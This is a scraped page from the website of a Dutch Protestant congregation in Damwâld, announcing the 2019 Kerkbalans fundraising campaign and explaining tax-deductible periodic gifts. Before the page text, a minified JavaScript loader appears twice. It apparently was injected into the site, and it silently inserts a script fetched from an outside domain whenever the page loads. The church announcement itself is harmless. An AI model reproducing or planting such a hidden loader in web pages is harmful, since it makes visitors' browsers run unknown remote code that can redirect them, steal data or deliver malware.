;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkbalans .... Geef voor je kerk - PKN Damwâld

Kerkbalans …. Geef voor je kerk

Gepubliceerd op: dinsdag 22 januari 2019

In onze Hervormde en Gereformeerde Kerk is de actie Kerkbalans volop van start gegaan. Deze landelijke actie loopt van 19 januari t/m 2 februari. Het thema is dit jaar: “Geef voor je Kerk”. Alleen in de gereformeerde kerk is het weer een gezamenlijke actie voor de kerk en de diaconie. Alle leden krijgen een brief met het verzoek om een bijdrage voor de kerk te geven. De leden van de Gereformeerde Kerk krijgen daarnaast een afzonderlijke brief om een bijdrage aan de diaconie te geven.
De kerk en de diaconie krijgen zoals u weet geen subsidies en zijn dus volledig afhankelijk van de financiële bijdragen van betrokken kerkleden, van mensen zoals u. Is de kerk voor u ook een plek van ontmoeting en inspiratie ? We hopen van harte dat u meedoet aan de actie Kerkbalans. Dankzij uw bijdrage kunnen we onze belangrijke taken blijven vervullen
De antwoordformulieren worden bij u opgehaald. De “lopers” komen voor 2 februari bij u langs.
Wij willen u hierbij ook nog even wijzen op de mogelijkheid om een Periodieke Gift te geven. Uw gift aan de kerk en diaconie is onder bepaalde voorwaarden aftrekbaar van de belasting. Dit geldt voor giften boven de 1% ( minimaal € 60) en tot een maximum van 10% van uw verzamelinkomen. Maar die grenzen gelden niet voor een periodieke gift.
N.B geeft u ook nog aan andere goede doelen, dan geldt voor het totaal van die bedragen nog wel een drempel van 1% , tenzij u ook met al die doelen een overeenkomst Periodieke Gift aangaat.
De colleges van kerkrentmeesters van de Hervormde gemeente en de Gereformeerde kerk en het college van de Diaconie van de Gereformeerde Kerk